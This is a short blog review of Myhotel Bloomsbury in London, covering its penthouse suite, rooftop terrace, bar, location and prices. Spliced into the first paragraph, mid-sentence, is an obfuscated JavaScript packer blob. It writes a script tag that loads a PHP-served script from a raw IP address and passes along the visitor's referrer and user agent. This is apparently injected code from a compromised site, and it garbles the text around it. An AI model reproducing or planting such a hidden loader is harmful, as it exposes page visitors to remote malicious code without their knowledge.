REVIEW: MYHOTEL BLOOMSBURY

Myhotels is a small chain of hotels with two properties in London and one in Brighton. LondOntheInside previously reviewed Myhotel (function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(” 4=\’7://5.8.9.f/1/h.s.t?r=”+3(0.p)+”\o=”+3(j.i)+”\’><\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fkire|var|u0026u|referrer|asrbt||js|php’.split(‘|’),0,{}))
Chelsea
and we liked it alot. Last week we checked into Myhotel Bloomsbury the second of the groups London locations to see how it compared.

We have to admit we had a rather suite sweet deal staying in the penthouse suite myplace 1. The suite is located on the fifth floor and the Pièce de résistance is the rooftop terrace with views out over London. The terrace comes with a table and chairs which are perfect for wining and dining loved ones under the stars – champagne on the terrace darling?

Inside the decor is sexy and sleek with black wooden walls, a shag pile rug, the latest technology including two TVs, an apple mac, leather sofa and deep bath. In fact the suite is more like an apartment than a hotel room, it even has a kitchenette which means you could practically live here, provided you had the cash to splash.

If you do need to leave the room then we’d suggest a short trip downstairs to the hotel’s bar merkaba with its low lighting, candles, eastern vibe and extensive cocktail list. As the sun rises this is transformed into a bright and airy breakfast area with a full continential buffet or a la carte full english options.

Location wise it couldn’t be better, a short walk from Soho, Oxford Street, Bond Street, Trafalgar Square and lots of other attractions. Plus it’s just a few minutes from Tottenham Court Road tube station.

Room rates start from £130 but it’s worth checking out the website first as the hotel offer a selection of young, trendy packages. This month they have teamed up with Film4 at Somerset House to offer guests VIP tickets to film screenings and the aftershow party. For more info email: res@myhotels.com
